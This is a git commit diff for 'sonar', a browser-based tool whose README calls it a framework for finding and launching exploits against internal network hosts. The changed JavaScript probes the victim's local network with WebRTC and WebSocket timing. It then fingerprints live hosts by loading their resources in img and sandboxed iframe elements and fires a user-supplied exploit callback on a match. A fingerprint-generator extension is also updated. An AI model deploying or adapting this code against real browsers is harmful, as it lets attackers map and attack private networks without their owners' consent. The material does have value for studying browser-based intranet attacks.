merge conflict resolution

jlyman · jlyman · commit 9d0d937a9f8c · 2015-08-25T23:26:04.000-05:00
diff --git a/README.md b/README.md
@@ -1,9 +1,10 @@
 # sonar
-A framework for identifying and launching exploits against internal network hosts. Works via WebRTC IP scanning combined with external resource fingerprinting.
+A framework for identifying and launching exploits against internal network hosts. Works via WebRTC IP enumeration, WebSocket host scanning, and external resource fingerprinting.
 
 ## How does it work?
 Upon loading the sonar payload in a modern web browser the following will happen:
-* sonar will use WebRTC to scan the internal network for live hosts.
+* sonar will use WebRTC to enumerate what internal IPs the user loading the payload has.
+* sonar then attempts to find live hosts on the internal network via WebSockets.
 * If a live host is found, sonar begins to attempt to fingerprint the host by linking to it via ```<img src="x">``` and ```<link rel="stylesheet" type="text/css" href="x">``` and hooking the ```onload``` event. If the expected resources load successfully it will trigger the pre-set JavaScript callback to start the user-supplied exploit.
 * If the user changes networks, sonar starts the process all over again on the newly joined network.
 
diff --git a/sonar.js b/sonar.js
@@ -129,7 +129,7 @@ var sonar = {
     'check_ip': function ( ip ){
         var done = false;
         var t1 = +new Date();
-        var socket = new WebSocket("ws://" + ip);
+        var socket = new WebSocket("ws://" + ip + '/' + sonar.generate_random_id() );
         socket.onerror = function(e){
             if(e.timeStamp - t1 < 10){
                 done = true;
@@ -223,7 +223,7 @@ var sonar = {
     },
 
     /*
-     * Internal host fingerprinting via SOP hacks
+     * Internal host fingerprinting via hooking onload and onerror. Even active content such as HTML pages and .js can be used here (as they are read via static iframes)
      */
     'check_resource_exists': function( resource, ip, id ) {
         var full_source = 'http://' + ip + ( resource instanceof Array ? resource[0] : resource );
@@ -238,12 +238,11 @@ var sonar = {
             var resourceref = document.createElement( "img" );
             resourceref.setAttribute( "id", element_id );
             resourceref.setAttribute( "src", full_source );
-        } else if ( full_source.toLowerCase().endsWith( '.js' ) ) {
-            var resourceref = document.createElement( "script" );
-            resourceref.setAttribute( "id", "testresource" );
-            resourceref.setAttribute( "src", full_source );
         } else {
-            return false;
+            var resourceref = document.createElement( "iframe" );
+            resourceref.setAttribute( "id", element_id );
+            resourceref.setAttribute( "src", full_source );
+            resourceref.setAttribute( "sandbox", "" );
         }
         resourceref.addEventListener( "error", function( event ) {
             document.getElementById( element_id ).remove();
diff --git a/sonar_fingerprint_generator/manifest.json b/sonar_fingerprint_generator/manifest.json
@@ -1,6 +1,6 @@
 {
   "name": "sonar - Fingerprint Generator",
-  "version": "0.0.8",
+  "version": "0.0.9",
   "manifest_version": 2,
   "description": "Fingerprint generator for the sonar project",
   "homepage_url": "https://github.com/mandatoryprogrammer/sonar",
diff --git a/sonar_fingerprint_generator/src/inject/inject.js b/sonar_fingerprint_generator/src/inject/inject.js
@@ -1,6 +1,9 @@
 function get_relative_path( url ) {
   var el = document.createElement('a');
   el.href = url;
+  if( el.protocol != 'http:' && el.protocol != 'https:' ) {
+    return false;
+  }
   if( el.port == "" ) {
     return el.pathname;
   } else {
@@ -19,23 +22,42 @@ function get_resource_array( document_ref ) {
       prints.push( document_ref.styleSheets[i].href );
     }
   }
+  for( var i = 0; i < document_ref.scripts.length; i++ ){
+    if( document_ref.scripts[i].src !== undefined && document_ref.scripts[i].src !== null ) {
+      prints.push( document_ref.scripts[i].src );
+    }
+  }
+  var new_prints = [];
+  console.log(prints);
   for( var i = 0; i < prints.length; i++ ){
-    if (prints[i] instanceof Array) {
-      prints[i][0] = get_relative_path( prints[i][0] );
-    } else {
-      prints[i] = get_relative_path( prints[i] );  
+    var tmp_print = get_relative_path( prints[i] instanceof Array ? prints[i][0] : prints[i] );
+    if( tmp_print != false ){
+      if (prints[i] instanceof Array) {
+        new_prints.push( [ tmp_print, prints[i][1], prints[i][2] ] );
+      } else {
+        new_prints.push( tmp_print );
+      }
     }
   }
+  prints = new_prints;
+  console.log( prints );
   return prints;
 }
 
 function recursive_element_collect( window_ref ) {
     var resource_array = [];
     for( i = 0; i < window_ref.frames.length; i++ ) {
         if( window_ref.frames[i].frames.length > 0 ) {
+          try {
             resource_array = resource_array.concat( recursive_element_collect( window_ref.frames[i] ) );
+          } catch (e) {}
         }
-        resource_array = resource_array.concat( get_resource_array( window_ref.frames[i].document ) );
+        try{
+          resource_array = resource_array.concat( get_resource_array( window_ref.frames[i].document ) );
+        } catch (e) {}
+        try{
+          resource_array.push( get_relative_path( window_ref.frames[i].location.href ) );
+        } catch (e) {}
     }
     resource_array = resource_array.concat( get_resource_array( window_ref.document ) );
     return resource_array;

Original file line number	Diff line number	Diff line change
`@@ -1,6 +1,6 @@`
`1`	`1`	`{`
`2`	`2`	`"name": "sonar - Fingerprint Generator",`
`3`		`- "version": "0.0.8",`
	`3`	`+ "version": "0.0.9",`
`4`	`4`	`"manifest_version": 2,`
`5`	`5`	`"description": "Fingerprint generator for the sonar project",`
`6`	`6`	`"homepage_url": "https://github.com/mandatoryprogrammer/sonar",`